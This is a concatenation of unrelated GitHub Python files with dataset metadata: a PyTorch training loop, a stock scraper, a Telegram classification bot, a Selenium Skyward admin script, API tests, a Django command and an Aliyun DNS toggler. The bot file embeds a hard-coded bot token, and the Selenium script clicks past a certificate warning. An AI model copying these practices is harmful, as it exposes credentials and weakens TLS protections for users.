        for k, v in inputs.items():
            inputs[k] = v.to(device)
        labels = labels.to(device)
        batch_size = labels.size(0)
        # No gradients needed for evaluation.
        with torch.no_grad():
            y_preds = model(inputs)
            loss = criterion(y_preds, labels)
        valid_losses.update(loss.item(), batch_size)
        predictions.append(y_preds.to('cpu').numpy())
        # Periodic progress line (always printed on the final batch).
        if step % config.general.valid_print_frequency == 0 or step == (len(valid_dataloader) - 1):
            remain = time_since(start, float(step + 1) / len(valid_dataloader))
            print('EVAL: [{0}][{1}/{2}] '
                  'Elapsed: {remain:s} '
                  'Loss: {loss.avg:.4f} '
                  .format(epoch+1, step+1, len(valid_dataloader),
                          remain=remain,
                          loss=valid_losses))
        # Log the per-batch loss, not the running average.
        if config.logging.use_wandb:
            wandb.log({f"Validation loss": valid_losses.val})
    predictions = np.concatenate(predictions)
    return valid_losses, predictions
def train_loop(config, train_df, val_df, device):
    """Full training loop: AMP training with AWP adversarial perturbation,
    per-epoch validation, and checkpointing of the best (lowest validation
    loss) and latest model states.

    :param config:   namespace holding general/training/logging/adversarial
                     hyper-parameters.
    :param train_df: training dataframe (text + 'label' column).
    :param val_df:   validation dataframe; its 'label' column is the target
                     for the accuracy metric.
    :param device:   torch device to train on.
    """
    # get the validation label
    valid_labels = val_df['label'].to_numpy()
    # prepare the data loaders
    train_dataloader = get_train_dataloader(config, train_df)
    valid_dataloader = get_valid_dataloader(config, val_df)
    # prepare the model
    model = get_model(config)
    model.to(device)
    # prepare the optimizer
    optimizer = get_optimizer(model, config)
    # get the steps to finish one epoch
    train_steps_per_epoch = int(len(train_df) / config.general.train_batch_size)
    # overall steps (used by the scheduler below)
    num_train_steps = train_steps_per_epoch * config.training.epochs
    # evaluation steps to finish one epoch
    eval_steps_per_epoch = int(len(val_df) / config.general.valid_batch_size)
    # overall eval steps
    # NOTE(review): `num_eval_steps` is computed but never used below.
    num_eval_steps = eval_steps_per_epoch * config.training.epochs
    # Adversarial Weight Perturbation; according to the author's and other
    # users' experiences it helped to increase accuracy significantly.
    awp = AWP(model=model,
              optimizer=optimizer,
              adv_lr=config.adversarial_learning.adversarial_lr,
              adv_eps=config.adversarial_learning.adversarial_eps,
              adv_epoch=config.adversarial_learning.adversarial_epoch_start)
    # get the loss function
    criterion = get_criterion(config)
    # get scheduler
    scheduler = get_scheduler(optimizer, config, num_train_steps)

    # Lower is better: "score" is the average validation loss.
    best_score = np.inf

    for epoch in range(config.training.epochs):
        start_time = time.time()
        model.train()
        # Gradient scaler for mixed-precision (no-op when apex is disabled).
        scaler = torch.cuda.amp.GradScaler(enabled=config.training.apex)
        train_losses = AverageMeter()
        valid_losses = None
        score, scores = None, None
        start = time.time()
        global_step = 0
        for step, (inputs, labels) in enumerate(train_dataloader):
            # collate and move the batch onto the device
            inputs = collate(inputs)
            for k, v in inputs.items():
                inputs[k] = v.to(device)
            labels = labels.to(device)
            # Apply the adversarial perturbation (active from adv_epoch on).
            awp.perturb(epoch)
            batch_size = labels.size(0)
            with torch.cuda.amp.autocast(enabled=config.training.apex):
                y_preds = model(inputs)
                loss = criterion(y_preds, labels)
                train_losses.update(loss.item(), batch_size)
            scaler.scale(loss).backward()
            # Undo the perturbation before the optimizer step.
            awp.restore()
            if config.training.unscale:
                scaler.unscale_(optimizer)
            grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), config.training.max_grad_norm)
            scaler.step(optimizer)
            scaler.update()
            optimizer.zero_grad()
            global_step += 1
            # Step-based LR schedule (one step per batch).
            scheduler.step()
            if (step % config.general.train_print_frequency == 0) or \
                    (step == (len(train_dataloader) - 1)):
                remain = time_since(start, float(step + 1) / len(train_dataloader))
                print(f'Epoch: [{epoch+1}][{step+1}/{len(train_dataloader)}] '
                      f'Elapsed {remain:s} '
                      f'Loss: {train_losses.val:.4f}({train_losses.avg:.4f}) '
                      f'Grad: {grad_norm:.4f} '
                      f'LR: {scheduler.get_lr()[0]:.8f} ')
        valid_losses, predictions = valid_fn(config, valid_dataloader, model, criterion, epoch, device)
        score = valid_losses.avg
        accuracy = get_score(valid_labels, predictions)
        print(f'Epoch {epoch+1} - Score: {score:.4f} - Accuracy: {accuracy:.4f}')
        # "score" here is the validation loss, not the accuracy -- lower wins.
        if score < best_score:
            best_score = score
            torch.save({'model': model.state_dict(), 'predictions': predictions}, os.path.join(config.general.model_fn_path, "best.pth"))
            print(f'\nEpoch {epoch + 1} - Save Best Score: {best_score:.4f} Model\n')
        # save the full state of the model as last.pth (resumable checkpoint)
        torch.save({
            'epoch': epoch,
            'model_state_dict': model.state_dict(),
            'optimizer_state_dict': optimizer.state_dict(),
            'loss': criterion,
        }, os.path.join(config.general.model_fn_path, "last.pth"))
        # Collapse parameter names to their first 4 dot-components so each
        # layer group is logged with its current learning rate.
        unique_parameters = ['.'.join(name.split('.')[:4]) for name, _ in model.named_parameters()]
        learning_rates = list(set(zip(unique_parameters, scheduler.get_lr())))
        if config.logging.use_wandb:
            wandb.log({f'{parameter} lr': lr for parameter, lr in learning_rates})
            wandb.log({f'Best Score': best_score})
        elapsed = time.time() - start_time
        print(f'Epoch {epoch + 1} - avg_train_loss: {train_losses.avg:.4f} '
              f'avg_val_loss: {valid_losses.avg:.4f} time: {elapsed:.0f}s '
              f'Epoch {epoch + 1} - Score: {score:.4f} Accuracy{accuracy}\n, '
              '=============================================================================\n')
        if config.logging.use_wandb:
            wandb.log({f"Epoch": epoch + 1,
                       f"avg_train_loss": train_losses.avg,
                       f"avg_val_loss": valid_losses.avg,
                       f"accuracy":accuracy,
                       f"Score": score,
                       })
    # Free GPU memory and cycle the garbage collector after training.
    torch.cuda.empty_cache()
    gc.collect()
def main(config):
    """End-to-end entry point: load the emotion splits, clean the text,
    build the tokenizer, and launch the training loop."""
    train_df, val_df, test_df = load_data()
    feat_col = 'text'
    label_col = 'label'

    # Normalise the raw text of every split in place.
    for frame in (train_df, val_df, test_df):
        frame[feat_col] = frame[feat_col].apply(preprocess_text)

    tokenizer = get_tokenizer(config)
    config.tokenizer = tokenizer

    # Optionally derive max sequence length from the training corpus.
    if config.general.set_max_length_from_data:
        print('Setting max length from data')
        config.general.max_length = get_max_len_from_df(train_df, tokenizer)

    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    train_loop(config, train_df, val_df, device)
def create_folders(config):
    """Create the per-run output directories and rewrite the config paths.

    Mutates ``config.general.model_fn_path`` / ``log_path`` to include the run
    id and ``tokenizer_dir_path`` to include the backbone name, then creates
    those directories.

    :raises FileExistsError: if this run id already has a model directory.
    """
    config.general.model_fn_path = os.path.join(config.general.model_fn_path, config.run_id)
    config.general.log_path = os.path.join(config.general.log_path, config.run_id)
    config.general.tokenizer_dir_path = os.path.join(config.general.tokenizer_dir_path, config.model.backbone_type)
    if os.path.exists(config.general.model_fn_path):
        # FileExistsError is an OSError (== IOError) subclass, so existing
        # `except IOError` callers still catch it.
        raise FileExistsError(
            f'Run id {config.run_id!r} is already used; please choose a different one')
    os.makedirs(config.general.model_fn_path)
    os.makedirs(config.general.log_path)
    # Tokenizer dir is shared per-backbone, so it may legitimately pre-exist.
    os.makedirs(config.general.tokenizer_dir_path, exist_ok=True)
def init_wandb(config, args):
    """Authenticate with Weights & Biases and open a run grouped by run id.

    :param config: namespace providing model/criterion names and
                   `logging.wandb.project`.
    :param args:   parsed CLI namespace (uses `run_id`).
    :return: the initialized wandb run object.
    """
    backbone_type = config.model.backbone_type
    criterion_type = config.criterion.criterion_type
    pooling_type = config.model.pooling_type
    # SECURITY NOTE(review): the API key is hard-coded (currently empty).
    # It should come from the WANDB_API_KEY environment variable or netrc,
    # never from source control.
    wandb.login(key='')
    wandb_run = wandb.init(
        project=config.logging.wandb.project,
        group=args.run_id,
        job_type='train',
        tags=[backbone_type, criterion_type, pooling_type, args.run_id],
        config=config,
        name=f'{args.run_id}'
    )
    return wandb_run
if __name__ == '__main__':
    args = parse_args()
    config_path = os.path.join(args.cfg)
    config = get_config(config_path)
    config = dictionary_to_namespace(config)
    config.run_id = args.run_id
    config.logging.use_wandb = args.use_wandb
    create_folders(config)
    # Fix: wandb initialisation was unconditional while seeding/training were
    # gated on `use_wandb`. Only log in to wandb when tracking was requested,
    # and always seed + train -- reproducibility must not depend on wandb.
    if config.logging.use_wandb:
        init_wandb(config, args)
    seed_everything(seed=config.general.seed)
    main(config)
| ixtiyoruz/EmotionClassification | src/train.py | train.py | py | 11,025 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "sys.path.insert",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_numb... |
70850460263 | import pandas as pd
import os
import time
from datetime import datetime
from os import listdir
from os.path import isfile, join
path ="/Users/Sanjay/Documents/StockPredictor/TodayStats"
def key_stats(gather="Total Debt/Equity"):
    """Extract the given key statistic (default Total Debt/Equity) from saved
    Yahoo-Finance HTML snapshots in `path`, combine it with the day's stock
    price and the DOW 30 close, and write the result to a CSV named after
    the statistic.

    :param gather: label of the statistic to scrape out of each saved page.
    """
    stock_list = [f for f in listdir(path) if isfile(join(path, f))]
    dow30_today_df = pd.read_csv("/Users/Sanjay/Documents/StockPredictor/TodaySummaryRpt/summaryReport.csv")
    dow30_df = pd.read_csv("/Users/Sanjay/Documents/StockPredictor/DJI.csv",
                           names=['Date', 'Open', 'High', 'Low', 'Close', 'Adj Close', 'Volume'])

    # Fix: DataFrame.append was removed in pandas 2.0; collect row dicts and
    # build the frame once at the end instead.
    rows = []
    # NOTE(review): the first directory entry is skipped -- presumably a
    # hidden/system file; confirm this is intentional.
    for each_file in stock_list[1:]:
        if not each_file:
            continue
        # Filenames look like "<YYYYMMDD>_<TICKER>.<ext>".
        ticker = each_file.split("_")[1].split(".")[0]
        date_stamp = datetime.strptime(each_file.split("_")[0], '%Y%m%d')
        unix_time = time.mktime(date_stamp.timetuple())
        full_file_path = path + "/" + each_file
        # Fix: the original leaked the file handle (open(...).read()).
        with open(full_file_path, 'r') as page:
            source = page.read()

        # Scrape the D/E value out of the React-rendered markup; the numeric
        # react-text ids are sequential, so locate the first one and derive
        # the rest. Pages without the statistic fall back to 0.
        try:
            i = int(source.split(gather + '</span><!-- react-text: ')[1].split(' -->')[0])
            devalue = float(source.split(
                gather + '</span><!-- react-text: ' + str(i)
                + ' --> <!-- /react-text --><!-- react-text: ' + str(i + 1)
                + ' -->(mrq)<!-- /react-text --><sup aria-label="KS_HELP_SUP_undefined" data-reactid="'
                + str(i + 2) + '"></sup></td><td class="Fz(s) Fw(500) Ta(end)" data-reactid="'
                + str(i + 3) + '">')[1].split('</td>')[0])
        except Exception:
            devalue = 0

        # Today's price for the ticker. Fix: reset to None each iteration so
        # a lookup miss no longer silently reuses the previous ticker's price.
        stock_price = None
        for _, row in dow30_today_df.iterrows():
            if ticker in row['Company']:
                stock_price = row['Price']
                break

        # DOW 30 close for the snapshot's date.
        dow30_date = datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')
        day_row = dow30_df[dow30_df['Date'] == dow30_date]
        dow30_value = float(day_row['Adj Close'].iloc[0])

        print("Date:", date_stamp, "Unix:", unix_time, "Ticker:", ticker,
              "DE ratio:", devalue, "Price:", stock_price, "Dow30:", dow30_value)
        rows.append({'Date': date_stamp, 'Unix': unix_time, 'Ticker': ticker,
                     'DE ratio': devalue, 'Price': stock_price, 'DOW30': dow30_value})

    df = pd.DataFrame(rows, columns=['Date', 'Unix', 'Ticker', 'DE ratio', 'Price', 'DOW30'])
    print(df.values)
    # Output filename: the statistic label with spaces/parens/slashes stripped.
    save = gather.replace(' ', '').replace(')', '').replace('(', '').replace('/', '') + '.csv'
    print(save)
    df.to_csv(save)


key_stats()
| cloudmesh-community/fa18-523-66 | project-code/PredictDowIndex_1.py | PredictDowIndex_1.py | py | 5,169 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.isfile",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_n... |
19331078030 | import telebot
from model_predict import predict
from preprocessing import preprocess_text
# SECURITY NOTE(review): the bot token is committed in source control; it
# should be loaded from an environment variable and the exposed token revoked.
bot = telebot.TeleBot(
    "2087987681:AAG813Ais8YRNy4nlhrHZTK5UfQc4ZYa55Y", parse_mode=None)
# for /start and /help commands
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
    # Greet the user and explain what the bot does.
    bot.reply_to(message, "Enter a message and we'll predict if it's hateful or not.")
@bot.message_handler(commands=['preprocess'])
def send_preprocessed(message):
    """Reply with the preprocessed form of the /preprocess message text.

    Fix: this handler was also named `send_welcome`, shadowing the
    /start handler's name at module level; renamed for clarity (telebot
    registration via the decorator is unaffected).
    """
    bot.reply_to(message, preprocess_text(message.text))
@bot.message_handler(func=lambda m: True)
def echo_all(message):
    """Classify any other incoming message and reply with the verdict."""
    verdict = predict(message.text)
    reply = "Your message is hate" if verdict == 1 else "Your message is fine"
    bot.reply_to(message, reply)
# Block forever, polling Telegram for updates (auto-reconnects on errors).
bot.infinity_polling()
| Jenpoer/pythoneers-hatespeech-bot | pythoneers_hatespeechbot.py | pythoneers_hatespeechbot.py | py | 876 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "telebot.TeleBot",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "preprocessing.preprocess_text",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "model_predict.predict",
"line_number": 24,
"usage_type": "call"
}
] |
71354369385 | #!/bin/usr/env python
# ===========================================================
# Created By: Richard Barrett
# Organization: DVISD
# DepartmenT: Data Services
# Purpose: Skyward Administration
# Date: 04/01/2020
# ===========================================================
import selenium
import shutil
import xlsxwriter
import os
import unittest
import requests
import subprocess
import getpass
import platform
import socket
import ssl
import pynput
import logging
import time
from pynput.keyboard import Key, Controller
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from datetime import date
# Decrypt the credentials file with gpg before loading it.
# NOTE(review): shell=True with a fixed command string is acceptable here,
# but keep the command free of user input.
decrypt = "gpg --output secrets.json --decrypt secrets.gpg"
if os.path.exists("secrets.gpg"):
    returned_value = subprocess.call(decrypt, shell=True)
else:
    print("The file does not exist!")
    print("You should probably create a secret!")
    print("gpg --output filename.gpg --encrypt filename.json")
# Mid-file import kept as-is; `config` holds the decrypted credentials.
import json
with open('secrets.json','r') as f:
    config = json.load(f)
# Definitions
# find_elements_by_name
# find_elements_by_xpath
# find_elements_by_link_text
# find_elements_by_partial_link_text
# find_elements_by_tag_name
# find_elements_by_class_name
# find_elements_by_css_selector
# System Variables
today = date.today()
# NOTE(review): this rebinding shadows the `date` class imported from
# datetime above -- later calls to date.today() in this module would fail.
date = today.strftime("%m/%d/%Y")
node = platform.node()
system = platform.system()
username = getpass.getuser()
version = platform.version()
keyboard = Controller()
# Upload Path Variables
# NOTE(review): Windows path without a raw-string prefix -- works here only
# because these escapes are not recognized; prefer r"..." for safety.
file_input_inactive_users = os.path.abspath("C:\Imports\CustomNameNeedsFormatting_02_24_2020_20_14_12_richardbarrett")
# URL Variables (currently unused placeholders)
login_url = ''
redirect_url = ''
reports_scheduler_url = ''
custom_reports_url = ''
# Check for Version of Chrome
# WebDriver Path for System: pick the chromedriver binary per OS.
if platform.system() == ('Windows'):
    browser = webdriver.Chrome("C:\Program Files (x86)\Google\Chrome\chromedriver.exe")
elif platform.system() == ('Linux'):
    browser = webdriver.Chrome(executable_path='/home/rbarrett/Drivers/Google/Chrome/chromedriver_linux64/chromedriver')
elif platform.system() == ('Darwin'):
    browser = webdriver.Chrome(executable_path='~/Drivers/Google/Chrome/chromedriver_mac64/chromedriver')
else:
    print("Are you sure you have the Selenium Webdriver installed in the correct path?")
# tearDown Method
def tearDown(self):
    # NOTE(review): unittest-style method at module level; never called in
    # this script and only works if passed an object with a `.browser` attr.
    self.browser.close()
# shutDown Method
def shutDown(self):
    # NOTE(review): same as tearDown above -- vestigial unittest method,
    # never invoked by this script.
    self.browser.quit()
# Parent URL
#browser.get("https://skyward-student.del-valle.k12.tx.us/scripts/wsisa.dll/WService=wsEAplus/seplog01.w?nopopup=true")
#options.addArguments("--ignore-certificate-errors")
# Open the Skyward training environment login page.
browser.get("https://skyward-dev.del-valle.k12.tx.us/scripts/wsisa.dll/WService=wsEAplusTrn/seplog01.w?nopopup=true")
time.sleep(5)
# Click on Advanced Button for Certificate Error
# XPATH //*[@id='details-button']
element = WebDriverWait(browser, 20).until(
    EC.element_to_be_clickable((By.XPATH, "//*[@id='details-button']")))
element.click();
# Click on Proceed
# XPATH //*[@id'proceed-link']
element = WebDriverWait(browser, 20).until(
    EC.element_to_be_clickable((By.ID, "proceed-link")))
element.click();
time.sleep(10)
# Credentials NEEDS UNIT TEST
# NOTE(review): find_element_by_id is the Selenium 3 API, removed in
# Selenium 4 (use find_element(By.ID, ...)). Also `username` rebinding
# shadows the getpass value assigned earlier in this module.
username = browser.find_element_by_id("login")
password = browser.find_element_by_id("password")
username.send_keys(config['user']['name'])
password.send_keys(config['user']['password'])
# Authentication submit.click()
# For XPATH = //*[@id='bLogin']
element = WebDriverWait(browser, 20).until(
    EC.element_to_be_clickable((By.XPATH, "//*[@id='bLogin']")))
element.click();
print("Logging into <insert_program>!")
print("Authenticated")
# Click and Span Skyward Contact Access
# Administration XPATH = //*[@id='nav_ContactAccess']/span
element = WebDriverWait(browser, 20).until(
    EC.element_to_be_clickable((By.XPATH, "//*[@id='nav_ContactAccess']/span")))
element.click();
# Click on Secured Users
# XPATH = //a[@id='nav_SecuredUsers']/span
element = WebDriverWait(browser, 20).until(
    EC.element_to_be_clickable((By.XPATH, "//a[@id='nav_SecuredUsers']/span")))
element.click();
# Load users.json File
# NOTE(review): this clobbers the `config` dict loaded from secrets.json
# earlier -- any later credential access would break; consider a new name.
with open('users.json','r') as f:
    config = json.load(f)
# Start of the (intended) per-user loop
# Send Keys to Lookup
# XPATH = //*[@id='brSecuredUsersLookupInput']
target_user = WebDriverWait(browser, 20).until(
    EC.element_to_be_clickable((By.XPATH, "//*[@id='brSecuredUsersLookupInput']")))
target_user.send_keys(config['sec_group_removal']['name_key']);
target_user.send_keys(Keys.RETURN);
time.sleep(2)
# Expand Button on Element Needing Sec Group Removal
# Class "bd_open"
print("fault 1")
time.sleep(2)
element = WebDriverWait(browser, 20).until(
    EC.element_to_be_clickable((By.CLASS_NAME, "bd_closed")))
element.click()
time.sleep(2)
print("post fault 1")
time.sleep(2)
# Click on Remove All Groups By Link Text
# find_elements_by_link_text
print("fault 2")
time.sleep(2)
element = WebDriverWait(browser, 20).until(
    EC.element_to_be_clickable((By.LINK_TEXT, "Remove All Groups")))
element.click()
time.sleep(2)
print("post fault 2")
time.sleep(2)
# Browser Switches to New Window Alert for Verification
# Browser Switches to Window
#WebDriverWait(browser,10).until(EC.number_of_windows_to_be(2))
#browser.switch_to.window(browser.window_handles[-1])
# Click Ok by ID
# XPATH //*[@id='msgBtn1']
time.sleep(2)
element = WebDriverWait(browser, 20).until(
    EC.element_to_be_clickable((By.XPATH, "//*[@id='msgBtn1']")))
element.click()
time.sleep(2)
# End of the (intended) per-user loop
| aiern/ITDataServicesInfra | Python/Skyward/Administration/remove_sec_groups_inactive_users.py | remove_sec_groups_inactive_users.py | py | 5,755 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "subprocess.call",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_num... |
36517097823 | import json
from sqlite_testdb import SqliteTest
class TestSbsVariationApi(SqliteTest):
    """Endpoint tests for the SBS variation / integrity REST API."""

    def test_get_integrity(self):
        """GET on an analysis' integrities returns its integrity rows."""
        response = self.client.get('/sbs/analyses/1/integrities')
        payload = json.loads(response.data)
        self.assertEqual('Success', payload['status']['message'])
        self.assertEqual(1, payload['data'][0]['id'])

    def test_update_tier(self):
        """PUT /sbs/variations updates tier_label for the listed variations."""
        body = json.dumps(dict(variation_list=[dict(variation_id=1, tier_label='Ignore')]))
        response = self.client.put('/sbs/variations', data=body,
                                   content_type='application/json')
        payload = json.loads(response.data)
        self.assertEqual('Success', payload['status']['message'])
        self.assertEqual(1, payload['data'][0]['id'])

    def test_update_tier_with_incorrect_variation_id(self):
        """A malformed variation_id yields an Error status."""
        body = json.dumps(dict(variation_list=[dict(variation_id='2a', tier_label='Ignore')]))
        response = self.client.put('/sbs/variations', data=body,
                                   content_type='application/json')
        payload = json.loads(response.data)
        self.assertEqual('Error', payload['status']['message'])
| rohitbs113/DupontSBS | tests/test_sbs_variation.py | test_sbs_variation.py | py | 1,611 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlite_testdb.SqliteTest",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "json.loads",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_... |
15130460020 | # Databricks notebook source
# MAGIC %pip install -r requirements.txt
# COMMAND ----------
import warnings
warnings.filterwarnings("ignore")
# COMMAND ----------
# MAGIC %sh
# MAGIC mkdir -p /dbfs/FileStore/solution_accelerators/digitization/ && touch /dbfs/FileStore/solution_accelerators/digitization/init.sh
# MAGIC cat <<EOF > /dbfs/FileStore/solution_accelerators/digitization/init.sh
# MAGIC #!/usr/bin/env bash
# MAGIC sudo apt-get install -y tesseract-ocr
# MAGIC sudo apt-get install -y poppler-utils
# MAGIC EOF
# COMMAND ----------
# Set mlflow experiment explicitly to make sure the code runs in both interactive execution and job execution
import mlflow
# `dbutils` is a Databricks-injected global; this resolves the current user.
username = dbutils.notebook.entry_point.getDbutils().notebook().getContext().userName().get()
mlflow.set_experiment('/Users/{}/document_digitization'.format(username))
model_name = 'table_classification'

# COMMAND ----------

# Set sector to include brewing companies
sector = 'i22'
# Here we use a `/tmp/...` path in DBFS to minimize dependency. We recommend using a `/mnt/...` path or one that directly connects to your cloud storage for production usage. To learn more about mount points, please review [this document](https://docs.databricks.com/dbfs/mounts.html). If you would like to use a mount point or a different path, please update the variable below with the appropriate path:
landing_zone = '/tmp/fsi/datasets/digitization/csr/files'
# Number of pages sampled per document downstream -- TODO confirm usage.
k = 3
landing_zone_fs = '{}/**/pages'.format(landing_zone)
# COMMAND ----------
| databricks-industry-solutions/digitization-documents | config/configure_notebook.py | configure_notebook.py | py | 1,508 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "mlflow.set_experiment",
"line_number": 24,
"usage_type": "call"
}
] |
16520579385 | import datetime
from operator import itemgetter
from django.core.management.base import BaseCommand, CommandError
from django.db.models import *
from buckley.models import *
def cache_totals():
    """Recompute cached spending aggregates for the 2010 cycle.

    Updates the singleton ``Total`` row (overall IE/EC totals plus the
    party-by-support/oppose breakdowns) and rebuilds the ``TopCommittee``,
    ``TopPartyCommittee``, ``TopRace`` and ``TopCandidate`` tables from
    expenditures filed within the last five days.
    """
    # Reuse the existing Total row if present; there is at most one.
    totals = Total.objects.all()
    if totals:
        total = totals[0]
    else:
        total = Total()

    # Independent expenditures vs. electioneering communications.
    ie_total = Expenditure.objects.filter(candidate__cycle=2010, electioneering_communication=False).aggregate(total=Sum('expenditure_amount'))['total']
    total.ie_total = ie_total
    ec_total = Expenditure.objects.filter(electioneering_communication=True).aggregate(total=Sum('expenditure_amount'))['total']
    total.ec_total = ec_total
    # BUG FIX: `ie_total or 0 + ec_total or 0` parsed as
    # `ie_total or (0 + ec_total) or 0` because `+` binds tighter than `or`,
    # so the EC amount was silently dropped whenever ie_total was truthy.
    # Parenthesize so None aggregates default to 0 and the sums are added.
    total.total = (ie_total or 0) + (ec_total or 0)

    # Per-party support/oppose totals, split into party vs. non-party committees.
    by_party = sorted(list(Expenditure.objects.exclude(support_oppose='', candidate__party='').filter(candidate__cycle=2010, candidate__party__in=['R', 'D',]).values('candidate__party', 'support_oppose').annotate(amt=Sum('expenditure_amount'))), key=itemgetter('candidate__party', 'support_oppose'), reverse=True)
    for i in by_party:
        i['party_cmtes'] = Expenditure.objects.filter(candidate__cycle=2010, committee__tax_status='FECA Party', candidate__party=i['candidate__party'], support_oppose=i['support_oppose']).aggregate(t=Sum('expenditure_amount'))['t'] or 0
        i['non_party_cmtes'] = Expenditure.objects.exclude(committee__tax_status='FECA Party').filter(candidate__cycle=2010, candidate__party=i['candidate__party'], support_oppose=i['support_oppose']).aggregate(t=Sum('expenditure_amount'))['t'] or 0
    for i in by_party:
        if i['candidate__party'] == 'R' and i['support_oppose'] == 'S':
            total.republican_support_nonparty = i['non_party_cmtes']
            total.republican_support_party = i['party_cmtes']
            total.republican_support_total = i['amt']
        elif i['candidate__party'] == 'R' and i['support_oppose'] == 'O':
            total.republican_oppose_nonparty = i['non_party_cmtes']
            total.republican_oppose_party = i['party_cmtes']
            total.republican_oppose_total = i['amt']
        elif i['candidate__party'] == 'D' and i['support_oppose'] == 'S':
            total.democrat_support_nonparty = i['non_party_cmtes']
            total.democrat_support_party = i['party_cmtes']
            total.democrat_support_total = i['amt']
        elif i['candidate__party'] == 'D' and i['support_oppose'] == 'O':
            total.democrat_oppose_nonparty = i['non_party_cmtes']
            total.democrat_oppose_party = i['party_cmtes']
            total.democrat_oppose_total = i['amt']

    # The "Top" tables only consider filings from the last five days.
    cutoff = datetime.date.today() - datetime.timedelta(days=5)
    non_party_committees = Expenditure.objects.filter(candidate__cycle=2010, expenditure_date__gt=cutoff).exclude(Q(committee__slug='') | Q(committee__tax_status='FECA Party')).order_by('committee').values('committee__name', 'committee__slug').annotate(amount=Sum('expenditure_amount')).order_by('-amount')
    TopCommittee.objects.all().delete()
    for committee in non_party_committees[:10]:
        c = Committee.objects.get(slug=committee['committee__slug'])
        amount = committee['amount']
        TopCommittee.objects.create(committee=c,
                                    amount=amount)

    party_committees = Expenditure.objects.filter(candidate__cycle=2010, expenditure_date__gt=cutoff, committee__tax_status='FECA Party').exclude(committee__slug='').order_by('committee').values('committee__name', 'committee__slug').annotate(amount=Sum('expenditure_amount')).order_by('-amount')
    TopPartyCommittee.objects.all().delete()
    for committee in party_committees[:10]:
        c = Committee.objects.get(slug=committee['committee__slug'])
        amount = committee['amount']
        TopPartyCommittee.objects.create(committee=c,
                                         amount=amount)

    top_races = Expenditure.objects.exclude(race='', candidate=None).filter(candidate__cycle=2010, expenditure_date__gt=cutoff).order_by('race').values('race').annotate(amount=Sum('expenditure_amount')).order_by('-amount')
    TopRace.objects.all().delete()
    for race in top_races[:10]:
        TopRace.objects.create(race=race['race'],
                               amount=race['amount'])

    top_candidates = Expenditure.objects.filter(candidate__cycle=2010, expenditure_date__gt=cutoff).order_by('candidate').values('candidate').annotate(amount=Sum('expenditure_amount')).order_by('-amount')[:10]
    TopCandidate.objects.all().delete()
    for candidate in top_candidates[:10]:
        try:
            TopCandidate.objects.create(candidate=Candidate.objects.get(pk=candidate['candidate']),
                                        amount=candidate['amount'])
        except Candidate.DoesNotExist:
            # Skip dangling candidate references rather than aborting the refresh.
            continue

    total.save()
class Command(BaseCommand):
    """Management command entry point: recompute all cached expenditure totals."""
    def handle(self, *args, **options):
        cache_totals()
| sunlightlabs/reportingsite | buckley/management/commands/cache_totals.py | cache_totals.py | py | 4,878 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "operator.itemgetter",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "datetime.date.today",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 45,
"usage_type": "attribute"
},
{
"api_name": "datetime.t... |
40130281674 | #!/usr/bin/env python
#coding=utf-8
# pip install aliyun-python-sdk-alidns
from aliyunsdkcore import client
from aliyunsdkalidns.request.v20150109 import SetDomainRecordStatusRequest
from flask import current_app
from datetime import datetime
class UpRecordStatus(object):
    '''
    Toggle Aliyun DNS record statuses (translated from the original Chinese).

    region_id must be requested via a support ticket; defaults to cn-hangzhou.
    DNS switchover: pause the Xiaomi FDS cname records => enable the Aliyun
    OSS cname records.
    '''
    def __init__(self):
        # Aliyun SDK client, authenticated from the Flask app config.
        self.clt = client.AcsClient(
            current_app.config['DNSACCESSKEYID'],
            current_app.config['DNSACCESSKEYSECRET'])
        self.request = SetDomainRecordStatusRequest.SetDomainRecordStatusRequest()
        self.request.set_accept_format('json')

    def changestatus(self):
        """Enable every record id in ENABLELIST, then disable those in DISABLELIST."""
        for recordid in current_app.config['ENABLELIST']:
            # Set request parameters.
            self.request.add_query_param('Status', 'Enable')
            self.request.add_query_param('RecordId', recordid)
            # Send the request.
            self.clt.do_action(self.request)
            print(datetime.now(),'启用dns'+recordid)
        for recordid in current_app.config['DISABLELIST']:
            self.request.add_query_param('Status', 'Disable')
            self.request.add_query_param('RecordId', recordid)
            self.clt.do_action(self.request)
            print(datetime.now(),'暂停dns'+recordid)
{
"api_name": "aliyunsdkcore.client.AcsClient",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "aliyunsdkcore.client",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "flask.current_app.config",
"line_number": 16,
"usage_type": "attribute"
},
{
... |
1132507113 | import logging
import time
import random
from langchain.agents import initialize_agent, load_tools
from langchain.chat_models import ChatOpenAI
logging.basicConfig()
logger = logging.getLogger()
# Root logger at DEBUG so per-task outcome messages are always visible.
